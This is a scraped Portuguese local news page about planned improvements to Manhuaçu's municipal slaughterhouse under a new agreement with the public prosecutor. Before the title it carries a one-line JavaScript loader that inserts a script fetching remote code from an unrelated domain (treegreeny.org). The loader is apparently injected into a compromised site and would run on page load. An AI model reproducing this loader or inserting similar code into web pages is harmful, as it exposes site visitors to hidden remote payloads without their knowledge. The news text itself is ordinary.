;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Matadouro Municipal de Manhuaçu receberá melhorias. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Matadouro Municipal de Manhuaçu receberá melhorias.

Os problemas com o matadouro municipal vêm de muitos anos e o Ministério Público desde a eleição do Prefeito Nailton Heringer tem conversado com o mesmo para que as melhorias pudessem ser feitas, ainda neste ano.
Em 2010 foi feito um TAC – Termo de Ajustamento de Conduta – pelo Ministério Público quando a Prefeitura deveria realizar melhorias estruturais no local, porém, o acordo não foi cumprido.
Com a eleição do novo prefeito, o MP retomou as conversas sobre a questão do matadouro e Heringer se colocou se prontificou a colaborar e declarou que é objetivo da Prefeitura reestruturar o local.
REUNIÃO COM A PROMOTORIA
Recentemente, foi realizada uma reunião com o secretário municipal de Agricultura de Manhuaçu, Eduardo Heringer, representantes da Promotoria, o administrador do matadouro Milton Ferreira e o presidente da Câmara dos Vereadores, Maurício Junior.
Na ocasião, foi acertado um novo Termo de Ajustamento de Conduta que determina que será feito, no período máximo de trinta dias, algumas melhorias paliativas no local. O administrador do matadouro também fez questão de informar que já adquiriu um terreno para a construção de um novo matadouro, este porém, particular, e pretende ser concluído em dezoitos meses.

O prédio antigo do matadouro municipal não atende às novas normas ambientais e de saúde
O prédio antigo do matadouro municipal não atende às novas normas ambientais e de saúde

Infomação: Arthur Rocha

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.